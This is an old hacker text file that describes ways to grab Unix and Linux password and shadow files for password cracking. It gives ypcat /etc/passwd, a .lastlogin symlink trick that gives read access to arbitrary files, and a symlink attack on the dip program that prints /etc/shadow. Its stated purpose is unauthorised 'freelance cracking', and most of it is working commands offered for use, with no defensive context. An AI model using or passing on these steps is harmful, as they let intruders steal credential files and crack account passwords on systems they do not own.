home *** CD-ROM | disk | FTP | other *** search
- This is by no means a complete or even good list of possible ways to get a
- copy of the shadow file, but it's some that work and are pretty handy to
- know if you do alot of freelance cracking.
-
- Unix including: SunOS, SCO, System V, and others of the like are sometimes
- vulnerable to ypcat. This is an old and well known trick but it works.. To
- use it simply type ypcat /etc/passwd with your capture option turned on, or
- use
-
- ypcat /etc/passwd > ~/passwd
-
- and download the passwd file from your home dir.
-
- Unix including: SCO, System V 3.2, ?, could be vulnerable to a hole using
- the .lastlogin file. In your home directory if a ls -al shows the
- .lastlogin to be owned by auth or root or anyone with better security then
- you it's good :) To exploit:
-
- rm -f ~/.lastlogin
- ln -s ~/.lastlogin /etc/passwd
-
- Now logout and then back in so you create the link.
-
- cat .lastlogin > passwd
- rm -f ~/.lastlogin
-
- This hole could have several other uses as well, the fact that it allows
- you read access to most any file on the system is a nice gift.
-
- Linux including: slackware, ?, not only can the dip hole be used to exploit
- root but it can also snag you the shadow file fairly easily. Why you
- wouldn't use it to get to root and then just edit/download it I have no
- clue but here it is anyways.. To exploit:
-
- ln -s /etc/shadow /tmp/dummy.dip
- /sbin/dip -v /tmp/dummy.dip
-
- Assuming dip is vulnerable this should type the shadow file for you and of
- course it's not limited to just reading the shadow file..
-
- If you know of other tricks, especially some that defeat linux shadow, and
- wish to share them mail Cassidy..
-